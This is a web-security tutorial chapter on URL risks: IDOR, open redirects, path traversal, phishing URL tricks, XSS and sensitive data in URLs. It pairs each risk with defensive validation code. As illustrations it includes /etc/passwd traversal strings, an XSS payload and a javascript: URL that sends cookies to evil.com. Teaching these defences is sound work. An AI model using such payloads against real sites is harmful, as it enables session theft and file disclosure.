06: URL Security

Why URLs Are a Security Concern

URLs are user-visible, modifiable, and trusted by both browsers and users. This creates security risks:

User-controllable: Anyone can type or modify a URL
Visible to others: URLs appear in logs, referrer headers, and browser history
Trusted by default: Users and systems tend to trust URL content
Part of the attack surface: URLs are input vectors for your application

Parameter Manipulation

Attackers can modify URL parameters to access unauthorized resources or bypass controls.

Direct Object Reference

When URLs directly expose database IDs, users can enumerate or access others' data:

// Vulnerable: User can change ID to view others' invoices
https://example.com/invoices/12345
https://example.com/invoices/12346  // Just increment!

// User changes their own profile URL
https://example.com/api/users/42/settings
https://example.com/api/users/43/settings  // Access other user!

Privilege Escalation

Parameters controlling permissions can be manipulated:

// Vulnerable: admin parameter in URL
https://example.com/dashboard?admin=false
https://example.com/dashboard?admin=true  // Attacker tries this

// Vulnerable: role in query string
https://example.com/api/user?role=viewer
https://example.com/api/user?role=admin

Prevention

Always verify authorization server-side
Use indirect references (tokens) instead of direct IDs when possible
Never trust client-provided role or permission data
Log and monitor unusual access patterns
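
The first rule above can be sketched as an ownership check that runs on the server for every request. This is a minimal illustration, not a complete access-control layer: the `invoices` map, the `getInvoiceForUser` function, and the `sessionUser` object are hypothetical names standing in for a database and a server-side session.

```javascript
// Hypothetical in-memory data standing in for a database.
const invoices = new Map([
  [12345, { id: 12345, ownerId: 42, total: 100 }],
  [12346, { id: 12346, ownerId: 43, total: 250 }],
]);

// Returns the invoice only if the authenticated user owns it.
// `sessionUser` must come from the server-side session, never from the URL.
function getInvoiceForUser(sessionUser, invoiceId) {
  const invoice = invoices.get(Number(invoiceId));
  if (!invoice || invoice.ownerId !== sessionUser.id) {
    // Same response for "missing" and "not yours", so the reply
    // does not confirm which IDs exist.
    return { status: 404, body: null };
  }
  return { status: 200, body: invoice };
}

const alice = { id: 42 };
console.log(getInvoiceForUser(alice, '12345').status); // 200 (own invoice)
console.log(getInvoiceForUser(alice, '12346').status); // 404 (someone else's)
```

Incrementing the ID in the URL still reaches the handler, but the handler refuses to return data the session user does not own.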

Open Redirect Vulnerabilities

An open redirect occurs when an application redirects users to a URL specified in a parameter without validation. Attackers use this to redirect users to malicious sites while the URL appears to come from a trusted domain.

The Attack

// Legitimate use: redirect after login
https://example.com/login?redirect=/dashboard

// Attacker crafts phishing link
https://example.com/login?redirect=https://evil-site.com/fake-login

// User sees "example.com" and trusts it, but ends up on attacker's site

Why It's Dangerous

Users trust the original domain in the URL
Can be used to steal credentials via fake login pages
Can slip past email filters and link scanners that only check the link's initial, trusted domain
Often used in phishing campaigns

Prevention

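// Validate redirect URLs
function isValidRedirect(url) {
  // params.get() returns null when the parameter is missing
  if (typeof url !== 'string') {
    return false;
  }

  try {
    // Parse the way the browser will, so tricks such as "//evil-site.com"
    // or "/\evil-site.com" resolve to their real destination before checking
    const parsed = new URL(url, window.location.origin);

    // Allow relative paths and other same-origin URLs
    if (parsed.origin === window.location.origin) {
      return true;
    }

    // Or validate against allowlist of domains
    const allowedHosts = ['example.com', 'sub.example.com'];
    return ['http:', 'https:'].includes(parsed.protocol) &&
      allowedHosts.includes(parsed.hostname);
  } catch {
    return false;
  }
}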

// Usage
const redirect = params.get('redirect');
if (isValidRedirect(redirect)) {
  window.location.href = redirect;
} else {
  window.location.href = '/'; // Safe default
}

Path Traversal Attacks

Path traversal (directory traversal) uses URL path manipulation to access files outside the intended directory.

The Attack

// Normal request
https://example.com/files/report.pdf

// Path traversal attempt
https://example.com/files/../../../etc/passwd
https://example.com/files/..%2F..%2F..%2Fetc%2Fpasswd

// Double-encoded variant
https://example.com/files/..%252F..%252F..%252Fetc%252Fpasswd
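
The encoded variants above work because a filter that inspects the raw string never sees a literal `../`. The sketch below shows one way to check for traversal only after the value has been fully decoded. The helper names `fullyDecode` and `containsTraversal` and the `maxRounds` limit are assumptions made for illustration, and a check like this complements resolving the path against an allowed directory rather than replacing it.

```javascript
// Decode repeatedly until the value stops changing (bounded by maxRounds).
// Returns null for malformed or excessively nested encoding.
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch {
      return null; // malformed percent-encoding: treat as invalid
    }
    if (decoded === current) {
      return current; // nothing left to decode
    }
    current = decoded;
  }
  return null; // still changing after maxRounds: treat as suspicious
}

// True if the decoded value contains a ".." path segment.
function containsTraversal(rawValue) {
  const decoded = fullyDecode(rawValue);
  if (decoded === null) {
    return true;
  }
  // Split on both separators so "..\" is caught as well as "../"
  return decoded.split(/[\\/]/).includes('..');
}

console.log(containsTraversal('report.pdf'));                      // false
console.log(containsTraversal('..%2F..%2Fetc%2Fpasswd'));          // true
console.log(containsTraversal('..%252F..%252Fetc%252Fpasswd'));    // true
```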

Prevention

Never construct file paths directly from URL input
Use allowlists of valid files or directories
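Validate input: reject any path that contains .. segments after decoding; stripping them is unreliable (....// becomes ../ once the inner ../ is removed)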
Resolve paths and verify they're within allowed directories
Use your framework's built-in file serving with proper sandboxing

// Dangerous: directly using URL parameter as path
const filename = req.params.file;
fs.readFile(`./uploads/${filename}`);  // BAD!

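// Safer: validate and resolve path
const path = require('path');
const uploadsDir = path.resolve('./uploads');
const safePath = path.resolve(uploadsDir, filename);

// Ensure resolved path is still within uploads directory.
// Comparing against uploadsDir + path.sep stops a sibling directory such as
// "uploads-private" from passing a plain prefix check.
if (!safePath.startsWith(uploadsDir + path.sep)) {
  throw new Error('Invalid path');
}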

URL-Based Phishing Techniques

Attackers use various URL manipulation techniques to make malicious links appear trustworthy.

Homograph Attacks

Using characters that look similar but are different Unicode code points:

// Legitimate
https://example.com

// Homograph attack using Cyrillic 'а' (U+0430) instead of Latin 'a' (U+0061)
https://exаmple.com  // Looks identical but different domain!
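
One way to surface a homograph is to look at the hostname after parsing: the standard `URL` parser converts non-ASCII hostnames to their Punycode form, whose labels begin with `xn--`. The sketch below uses that to flag such hosts. The function name `hasPunycodeLabel` is hypothetical, and flagging every internationalized domain is a blunt heuristic, since many legitimate sites use them.

```javascript
// Returns true if any label of the parsed hostname is Punycode-encoded,
// which means the original hostname contained non-ASCII characters.
function hasPunycodeLabel(urlString) {
  const { hostname } = new URL(urlString);
  return hostname.split('.').some((label) => label.startsWith('xn--'));
}

// "\u0430" is the Cyrillic letter from the example above.
const lookalike = 'https://ex\u0430mple.com';

console.log(new URL(lookalike).hostname);            // Punycode form, not "example.com"
console.log(hasPunycodeLabel(lookalike));            // true
console.log(hasPunycodeLabel('https://example.com')); // false
```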

Subdomain Deception

// User expects: example.com
// Attacker creates: example.com.evil-site.net

// Or uses confusing subdomain structure
https://login.example.com.secure-verify.net
https://www.example.com.account-verify.net
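
These links fool code as well as people when a check only asks whether the hostname contains the trusted name. A minimal sketch of a stricter comparison follows; `belongsToDomain` is a hypothetical helper, and it assumes the hostname has already been extracted with a real URL parser.

```javascript
// True if `hostname` is `trustedDomain` itself or a subdomain of it.
function belongsToDomain(hostname, trustedDomain) {
  const host = hostname.toLowerCase();
  const domain = trustedDomain.toLowerCase();
  // The leading dot matters: without it "evilexample.com" would match.
  return host === domain || host.endsWith('.' + domain);
}

const deceptive = new URL('https://login.example.com.secure-verify.net').hostname;

console.log(deceptive.includes('example.com'));                  // true  (naive check is fooled)
console.log(belongsToDomain(deceptive, 'example.com'));          // false
console.log(belongsToDomain('login.example.com', 'example.com')); // true
```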

URL Shortening Obfuscation

// User can't see destination
https://bit.ly/3xyz123  // Could go anywhere

Userinfo Field Abuse

The URL standard allows userinfo before the host, which can be misleading:

// User thinks they're going to google.com
https://google.com@evil-site.net

// The actual host is evil-site.net
// "google.com" is just the username!
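
Parsing the link with the standard `URL` API makes the split between userinfo and host explicit, which is a quick way to confirm where such a link really points:

```javascript
const parsed = new URL('https://google.com@evil-site.net');

console.log(parsed.hostname); // "evil-site.net"
console.log(parsed.username); // "google.com"
```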

XSS via URLs

Cross-Site Scripting (XSS) attacks can use URLs to inject malicious scripts.

Reflected XSS

// Vulnerable: displaying search term without encoding
https://example.com/search?q=<script>alert('XSS')</script>

// If the server renders this directly into HTML:
<p>Results for: <script>alert('XSS')</script></p>

javascript: URLs

// If user-provided URLs are used in href without validation:
<a href="javascript:alert('XSS')">Click me</a>

// Attacker provides:
https://example.com/redirect?url=javascript:document.location='https://evil.com/steal?c='+document.cookie

Prevention

Always HTML-encode URL parameters when displaying them
Validate URL schemes (allow only http: and https:)
Use Content Security Policy (CSP) headers
Use your framework's built-in escaping functions

// Validate URL before using in href
function isSafeUrl(url) {
  try {
    const parsed = new URL(url, window.location.origin);
    return ['http:', 'https:'].includes(parsed.protocol);
  } catch {
    return false;
  }
}
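
For the first item in the prevention list, HTML-encoding means replacing the characters that HTML treats as markup before the value is placed into a page. The `escapeHtml` function below is a hand-written sketch for illustration; in a real application, prefer the escaping built into your framework or template engine, as the list advises.

```javascript
// Replace the five characters that are significant in HTML text and attributes.
// "&" must be replaced first so the other entities are not double-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The search term from the reflected XSS example above
const params = new URLSearchParams("q=<script>alert('XSS')</script>");
const html = `<p>Results for: ${escapeHtml(params.get('q'))}</p>`;

console.log(html);
// <p>Results for: &lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</p>
```

The browser now displays the search term as text instead of executing it.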

Sensitive Data in URLs

URLs are logged, cached, and shared in ways that can expose sensitive data.

Where URLs Are Exposed

Browser history: Accessible to anyone with device access
Server logs: URLs are logged by web servers, proxies, CDNs
Referrer headers: The current page's URL can be sent to external sites when the user follows a link or the page loads third-party resources
Bookmarks and sharing: Users may share URLs containing sensitive data
Analytics tools: URLs often captured for traffic analysis
Browser extensions: May have access to URLs
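
Where a URL has to be written to a log or passed to an analytics tool, one mitigation is to redact known-sensitive parameters first. The sketch below is an assumption-laden example: the `SENSITIVE_PARAMS` list and the `redactUrl` function are hypothetical, and redaction is a fallback for data that should not have been in the URL to begin with.

```javascript
// Hypothetical list of parameter names this application treats as sensitive.
const SENSITIVE_PARAMS = ['token', 'api_key', 'session', 'ssn'];

// Returns the URL with sensitive query values replaced, suitable for logging.
function redactUrl(urlString, sensitive = SENSITIVE_PARAMS) {
  const url = new URL(urlString);
  for (const name of sensitive) {
    if (url.searchParams.has(name)) {
      url.searchParams.set(name, 'REDACTED');
    }
  }
  return url.toString();
}

console.log(redactUrl('https://example.com/account?token=secret&page=2'));
// https://example.com/account?token=REDACTED&page=2
```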

What Not to Put in URLs

Passwords or API keys
Session tokens (use cookies instead)
Personally identifiable information (SSN, credit cards)
Security tokens (this includes CSRF tokens; send them in headers or request bodies instead)

// BAD: API key in URL
https://api.example.com/data?api_key=secret123

// BAD: Session token in URL
https://example.com/dashboard?session=abc123xyz

// BAD: Personal data in URL
https://example.com/user?ssn=123-45-6789

// GOOD: Use headers instead
fetch('/api/data', {
  headers: {
    'Authorization': 'Bearer secret123',
    'X-Session-Token': 'abc123xyz'
  }
});

Referrer Leakage

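When a user follows a link to an external site, the browser may send the current page's URL in the Referer header. Modern browsers default to strict-origin-when-cross-origin, which sends only the origin to other sites, but older browsers and pages with a more permissive policy (such as unsafe-url) send the full URL, including the query string: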

// User is on: https://example.com/account?token=secret
// They click external link to: https://external.com

// External site receives:
Referer: https://example.com/account?token=secret
// The token is now exposed!

Prevention:

<!-- Control referrer for specific links -->
<a href="https://external.com" rel="noreferrer">External Link</a>

<!-- Or set policy for entire page -->
<meta name="referrer" content="strict-origin-when-cross-origin">

URL Validation Best Practices

Comprehensive URL Validation Function

function validateUserUrl(input, options = {}) {
  const {
    allowedSchemes = ['https:', 'http:'],
    allowedHosts = null,  // null means any host
    requireHttps = false,
    maxLength = 2000
  } = options;

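  // Type check (input is null or undefined when the parameter is missing)
  if (typeof input !== 'string') {
    return { valid: false, reason: 'URL must be a string' };
  }

  // Length check
  if (input.length > maxLength) {
    return { valid: false, reason: 'URL too long' };
  }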

  // Try parsing
  let url;
  try {
    url = new URL(input);
  } catch {
    return { valid: false, reason: 'Invalid URL format' };
  }

  // Scheme validation
  if (!allowedSchemes.includes(url.protocol)) {
    return { valid: false, reason: 'Invalid protocol' };
  }

  // HTTPS requirement
  if (requireHttps && url.protocol !== 'https:') {
    return { valid: false, reason: 'HTTPS required' };
  }

  // Host allowlist
  if (allowedHosts && !allowedHosts.includes(url.hostname)) {
    return { valid: false, reason: 'Host not allowed' };
  }

  // Reject userinfo (potential phishing)
  if (url.username || url.password) {
    return { valid: false, reason: 'Credentials in URL not allowed' };
  }

  return { valid: true, url };
}

// Usage
const result = validateUserUrl(userInput, {
  allowedSchemes: ['https:'],
  requireHttps: true
});

if (result.valid) {
  // Safe to use result.url
}

Security Checklist

Validate scheme (protocol) against allowlist
Check host against allowlist if redirecting
Reject userinfo (username:password@ format)
Limit URL length
URL-encode user data in parameters
HTML-encode URLs when displaying
Use rel="noreferrer" for external links
Don't put sensitive data in URLs
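
For the "URL-encode user data in parameters" item, a small sketch: building the query string through `URLSearchParams` rather than string concatenation keeps user input from introducing extra parameters. The `buildSearchUrl` function and the `q` parameter name are illustrative assumptions.

```javascript
// Build a search URL with the user's text as a single, encoded parameter.
function buildSearchUrl(baseUrl, query) {
  const url = new URL(baseUrl);
  url.searchParams.set('q', query); // the value is percent-encoded automatically
  return url.toString();
}

// Input that tries to smuggle in a second parameter
const searchUrl = buildSearchUrl('https://example.com/search', 'a&admin=true');
const roundTrip = new URL(searchUrl).searchParams;

console.log(roundTrip.get('q'));     // "a&admin=true" (kept as one value)
console.log(roundTrip.get('admin')); // null (no extra parameter was created)
```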